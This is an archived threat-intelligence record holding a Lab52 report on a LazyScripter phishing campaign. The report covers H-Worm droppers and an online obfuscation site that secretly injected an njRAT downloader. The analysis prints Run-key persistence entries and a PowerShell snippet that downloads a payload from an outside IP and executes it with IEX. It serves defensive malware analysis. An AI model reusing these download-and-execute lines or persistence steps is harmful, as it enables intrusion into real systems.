{
	"id": "1bf13e7c-e3f3-4cc6-b39f-92fdfcea50bd",
	"created_at": "2026-04-06T00:06:44.871687Z",
	"updated_at": "2026-04-10T03:29:44.366259Z",
	"deleted_at": null,
	"sha1_hash": "bf5efce8fcd8ffaed57f5417139cdee681e26934",
	"title": "Very very lazy Lazyscripter’s scripts: double compromise in a single obfuscation",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1414398,
	"plain_text": "Very very lazy Lazyscripter’s scripts: double compromise in a single obfuscation\r\nPublished: 2022-03-09 · Archived: 2026-04-05 13:39:32 UTC\r\nIn July 2021, we identified an infection campaign targeting important European entities. During this investigation we identified the threat actor behind these attacks as LazyScripter, an emerging APT group pointed out by Malwarebytes in February 2021.\r\nThrough our analysis, we could track their activity in 2021 with precise dates, based on their samples. Furthermore, we could extend the intelligence on this threat actor by identifying a new piece of malware among their TTPs, and also find new elements of their infrastructure.\r\nAdditionally, after analyzing the samples, we discovered the use of a free and popular online script obfuscation tool, which injects its own downloader for an njRAT sample into LazyScripter’s malware. This means that an entity compromised by one of these LazyScripter samples would probably be compromised by two different threat actors.\r\nFor this campaign, the malicious actor used phishing emails as the initial vector, impersonating relevant international entities such as the United Nations World Tourism Organization (UNWTO) or the International Air Transport Association (IATA). In the malicious emails, the actor would usually attach three compressed files: a PDF document and two JavaScript files.\r\nhttps://lab52.io/blog/very-very-lazy-lazyscripters-scripts-double-compromise-in-a-single-obfuscation/\r\nPage 1 of 12\n\nPDF document from spear phishing\r\nAfter analyzing the first PDF document that ended up in our hands (“JOB NOTICE.pdf” – UNWTO) we did not observe embedded code or any malicious behavior. 
However, metadata revealed that it had been edited with a PDF editor referred to as “Foxit” on July 13th 2021, less than a month before we identified this campaign.\r\nProducer: Foxit PhantomPDF Printer Version 9.6.0.1818\r\nCreationDate: Tue Nov 10 08:30:41 2020 CET\r\nModDate: Tue Jul 13 22:17:50 2021 CEST\r\nThe only technical element of real interest found in this document was the hyperlink that the user is encouraged to click in order to obtain more information about the fake job offer at UNWTO.\r\nThis link opens a browser and contacts the domain securessl.]fit, which was registered on July 17th 2021 and resolves to the address 192.64.]119.125, associated with the hosting provider Namecheap.\r\nThe final URL, reached after a redirection by an HTTP 302 response from the server, was observed as follows. It was not serving any file at the moment of the analysis, but the path suggests it was supposed to serve a .zip file (though we did not rule out IP geofencing):\r\nFinal HTTP response via hyperlink from PDF doc\r\nAfter analyzing the HTTP traffic flow with this domain, the redirection is observed to be hidden behind a domain belonging to the duckdns dynamic DNS service:\r\nMiddle/Transitional HTTP request from PDF\r\nThis domain resolves to the IP address 66.29.]130.204. 
Even so, the redirection through this address uses TLS encryption, so it is not possible to know what occurred during the communication until the final redirection, which ends with the previously shown HTTP 404 response code.\r\nNevertheless, we did observe that the same IP address is associated with the “server1” hostname in the domain gowaymevps.]xyz (registered on May 12th 2021).\r\nFinal HTTP request from PDF\r\nTraffic capture for the PDF hyperlink\r\nThe other two files found along with this PDF on its arrival via phishing email have exactly the same content (even the same hash) in spite of having different names:\r\nLIST OF AVAILABLE JOBS.js\r\nSALARY AND HIRING CONDITIONS.js\r\nThis highly obfuscated JavaScript has the sole purpose of dropping a second VBS script, which is placed in the following paths:\r\nC:\\Users\\*\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\tk.vbs\r\nC:\\Users\\*\\AppData\\Roaming\\tk.vbs\r\nFor those samples where the VBS script was not dropped in the startup folder, the following persistence mechanism would be established using the registry keys:\r\nHKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\tk\r\nDetails: wscript.exe //B “C:\\Users\\Lucas\\AppData\\Roaming\\tk.vbs”\r\nHKU\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\tk1\r\nDetails: wscript.exe //B “C:\\Users\\Lucas\\AppData\\Roaming\\tk.vbs”\r\nAnd here is where the real fun begins. 
In the initial behavior analysis of these next-stage VBS samples, we observed C2 contact through HTTP POST requests to port 449 of the IP address 45.91.92.112, resolved from stub.]ignorelist.]com.\r\nAt this point we could find an attribution according to different reports, since the domain stub.]ignorelist.]com had been used by the group referred to as LazyScripter in their previous campaign.\r\nThe HTTP request is made using the path “/is-ready” in the URI, and it includes initial information about the infected system within the User-Agent header value:\r\nVBS sample HTTP request\r\nFurthermore, we observed that the VBS script also dropped the following .lnk file to disk:\r\nC:\\Users\\Lucas\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\windowsUpdate.lnk\r\nThis shortcut points at the following PowerShell execution:\r\n$NQJLOJWQ=(Get-ItemProperty HKCU:\\Software).Sat;\r\n$WASUXIQO=(Get-ItemProperty HKCU:\\Software).Dat;\r\n$NILSHSEJ=(Get-ItemProperty HKCU:\\Software).Gat;\r\n$MYG\r\nThe values of the registry keys which this command refers to contain this series of PowerShell commands:\r\n[System.Net.WebClient]$webClient = New-Object System.Net.WebClient;\r\n[System.IO.Stream]$stream = $webClient.OpenRead(‘http://185. 81.157.186/NDA/199.png’);\r\n[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;\r\n[string]$results = $sr.ReadToEnd();\r\nIEX $results\r\nRegistry Keys set by VBS sample\r\nOur first impression was one of surprise, since we had just observed the sample establishing a second persistence in the same startup folder for an artifact (the .lnk file) that would use a different C2.\r\nAfter deobfuscating the VBS script we could identify the malware sample as Houdini’s H-Worm, but preceded by an interesting line, still slightly obfuscated. 
This single line was responsible for the second, parallel behavior (new persistence using the .lnk file and a different C2).\r\nWhile the first IP addresses and domains mentioned for the infection chain were not easily linked to malicious activity through OSINT, this last one was quickly tagged as malicious everywhere.\r\nOSINT results for suspicious IP address\r\nNow it started to get even more interesting, as we also discovered that, even though no domain points at this IP address at this time, it used to resolve from the hackfree.]org domain, which belongs to the top 1 million and seems to be some web service for offensive operations/techniques:\r\nDNS resolutions on suspicious IP address\r\nGoogle results for hackfree.]org\r\nSince this finding could be a little confusing, as it was for us, let’s go back to the dropped VBS script. This script is the one that implements the RAT identified as H-Worm after a complex nested obfuscation, prepended with a confusing extra line.\r\nPart of this obfuscation involved the creation of a new script object which executes the deobfuscated code. 
For this purpose, the first part of the logic consists in identifying the architecture of the infected system, and then creating nested ScriptControl objects, to which the code implementing the whole of H-Worm is added. This code is read from an array which must necessarily be located in the last line of the file, commented out, and which contains a total of 16,153 obfuscated elements.\r\nContent of VBS sample (tk.vbs)\r\ntk.vbs deobfuscated\r\nNow we knew that this VBS script acted as some sort of loader for the final-stage artifact, which was fully implemented in the aforementioned last line, supposedly a comment line in VBS. In order to compare the different samples that we gathered, we implemented an automatic deobfuscator to directly obtain the deobfuscated code contained in the commented line, and we always found this first line prepended before the H-Worm code.\r\nFinal VBS payload (H-Worm)\r\nBefore analyzing this extra suspicious code, which we could corroborate was not part of the known source code for H-Worm, the obvious thought was that these lines had been added by the LazyScripter criminals and that they were placing dates in the script for their own reasons. However, it still seemed weird that they would reward the threat/forensic analysts with a precise date for each sample.\r\nAfter analyzing the snippets, we observed that the samples would compare the current date with the hardcoded date, and if the hardcoded day had arrived or passed, execute a specific function appended at the end of H-Worm’s code. 
This function would only drop the previously described .lnk file and set the mentioned registry key values so as to download a sample of njRAT. Even though the author of H-Worm, known as “Houdini”, had been connected to the development of njRAT, we knew this wasn’t part of the known implementation of H-Worm, and it still looked odd as a TTP from the same infection campaign.\r\nTrying to make sense of it, we had the idea of using the information we had about this parallel behavior to make a quick check: we had previously found out that they might have been using hackfree.]org as an online obfuscation service for VBS scripts, so we created our own dummy VBS script and submitted it to hackfree for obfuscation. Then we applied our deobfuscator to the result.\r\nImplemented dummy VBS script\r\nDummy VBS script obfuscated via hackfree website\r\nDeobfuscation of obfuscated dummy VBS script\r\nAt this point, we discovered that hackfree.]org was injecting its own malware into every script obfuscated via its website. This leads to a double infection for malware obfuscated with hackfree.]org, or a first “sneaky” infection for those scripts that were obfuscated for legitimate purposes. 
In this last scenario we could confirm that hackfree.]org would amount to a watering hole attack.\r\nFinally, back to the tracked threat actor, we could distinguish between LazyScripter’s indicators of compromise and HackFree’s IOCs, resulting in the following diagram of the main infrastructure and infection chain of this LazyScripter campaign.\r\nLazyScripter’s H-Worm campaign’s main infrastructure\r\nIOCs\r\nCustomers of Lab52’s private APT intelligence feed service already have more tools and means of detection for this campaign.\r\nIf you have a threat hunting service or are a client of S2Grupo CERT, this intelligence has already been applied.\r\nIf you need more information about Lab52’s private APT intelligence feed service, you can contact us through the following link\r\nSource: https://lab52.io/blog/very-very-lazy-lazyscripters-scripts-double-compromise-in-a-single-obfuscation/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://lab52.io/blog/very-very-lazy-lazyscripters-scripts-double-compromise-in-a-single-obfuscation/"
	],
	"report_names": [
		"very-very-lazy-lazyscripters-scripts-double-compromise-in-a-single-obfuscation"
	],
	"threat_actors": [
		{
			"id": "b20281dd-8cc4-4284-b85c-f98c7e09ae48",
			"created_at": "2022-10-25T15:50:23.642844Z",
			"updated_at": "2026-04-10T02:00:05.392724Z",
			"deleted_at": null,
			"main_name": "LazyScripter",
			"aliases": [
				"LazyScripter"
			],
			"source_name": "MITRE:LazyScripter",
			"tools": [
				"Remcos",
				"QuasarRAT",
				"njRAT",
				"ngrok",
				"Koadic",
				"KOCTOPUS"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "712fc9fa-4283-431b-882c-5e0de9c12452",
			"created_at": "2022-10-25T16:07:23.770209Z",
			"updated_at": "2026-04-10T02:00:04.745132Z",
			"deleted_at": null,
			"main_name": "LazyScripter",
			"aliases": [
				"G0140"
			],
			"source_name": "ETDA:LazyScripter",
			"tools": [
				"Adwind",
				"Adwind RAT",
				"Alien Spy",
				"AlienSpy",
				"Bladabindi",
				"CinaRAT",
				"EmPyre",
				"EmpireProject",
				"Empoder",
				"Frutas",
				"Gussdoor",
				"Invoke-Ngrok",
				"JBifrost RAT",
				"JSocket",
				"Jorik",
				"KOCTOPUS",
				"Koadic",
				"Luminosity RAT",
				"LuminosityLink",
				"Nishang",
				"PowerShell Empire",
				"Quasar RAT",
				"QuasarRAT",
				"Remcos",
				"RemcosRAT",
				"Remote Manipulator System",
				"Remvio",
				"RuRAT",
				"Sockrat",
				"Socmer",
				"Trojan.Maljava",
				"UnReCoM",
				"Unknown RAT",
				"Unrecom",
				"Yggdrasil",
				"jBiFrost",
				"jConnectPro RAT",
				"jFrutas",
				"njRAT"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434004,
	"ts_updated_at": 1775791784,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/bf5efce8fcd8ffaed57f5417139cdee681e26934.pdf",
		"text": "https://archive.orkl.eu/bf5efce8fcd8ffaed57f5417139cdee681e26934.txt",
		"img": "https://archive.orkl.eu/bf5efce8fcd8ffaed57f5417139cdee681e26934.jpg"
	}
}